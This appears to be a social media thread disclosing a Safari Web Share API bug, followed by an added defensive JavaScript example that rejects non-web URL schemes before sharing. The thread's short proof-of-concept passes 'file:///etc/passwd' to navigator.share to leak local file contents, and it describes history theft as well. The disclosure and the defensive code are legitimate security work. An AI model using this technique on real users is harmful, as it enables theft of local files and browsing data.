-
Wow, this Web Share API bug ⤵️ is concerning.

const pwn = () => {
  navigator.share({
    text: 'Check out this cute kitten!',
    url: 'file:///etc/passwd',
  });
};

Turns out Safari actually shares the _contents_ of /etc/passwords, and allows for stealing the history, too. x.com/firt/status/1298338366065451008
-
For anyone following along, this is now tracked as github.com/w3c/web-share/issues/173 in the Web Share API repo. As a public trace, I've filed @webkit bug bugs.webkit.org/show_bug.cgi?id=215842, since Apple's internal Radar—which doubtlessly exists judging from blog.redteam.pl/2020/08/stealing-local-files-using-safari-web.html#content:~:text=Disclosure%20timeline—isn't public.
-
Hopefully needless to say: Full credits to @h0wlu.
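
An added example, not part of the thread and not WebKit's or the spec's own code: a scheme allow-list applied to share data before it reaches a share target, which is the class of check the `file:///etc/passwd` case above slips past. The helper name `checkShareData` and the http/https-only policy are assumptions made for this example.

```javascript
// Assumption for this example: only web URLs may be shared.
const ALLOWED_SHARE_SCHEMES = new Set(['http:', 'https:']);

// Hypothetical helper: validates share data shaped like the argument of
// navigator.share() and returns a normalized copy, or a rejection reason.
function checkShareData(data, baseURL) {
  const out = {};
  for (const key of ['title', 'text']) {
    if (data[key] !== undefined) out[key] = String(data[key]);
  }
  if (data.url !== undefined) {
    let parsed;
    try {
      // Resolve against the page URL so relative URLs are judged by the
      // scheme they actually end up with.
      parsed = new URL(String(data.url), baseURL);
    } catch {
      return { ok: false, reason: 'unparseable url' };
    }
    // URL parsing lowercases the scheme, so 'FILE:' is caught as well.
    if (!ALLOWED_SHARE_SCHEMES.has(parsed.protocol)) {
      return { ok: false, reason: `scheme ${parsed.protocol} not shareable` };
    }
    out.url = parsed.href;
  }
  if (Object.keys(out).length === 0) {
    return { ok: false, reason: 'nothing to share' };
  }
  return { ok: true, data: out };
}

// Constructed sample inputs.
const base = 'https://example.com/page';
console.log(checkShareData(
  { text: 'Check out this cute kitten!', url: 'file:///etc/passwd' }, base));
console.log(checkShareData({ text: 'Kittens', url: '/kittens' }, base));
```

A check like this in page script only protects applications that build share data from untrusted input; the bug described in the thread has to be fixed in the browser's own handling of the `url` member.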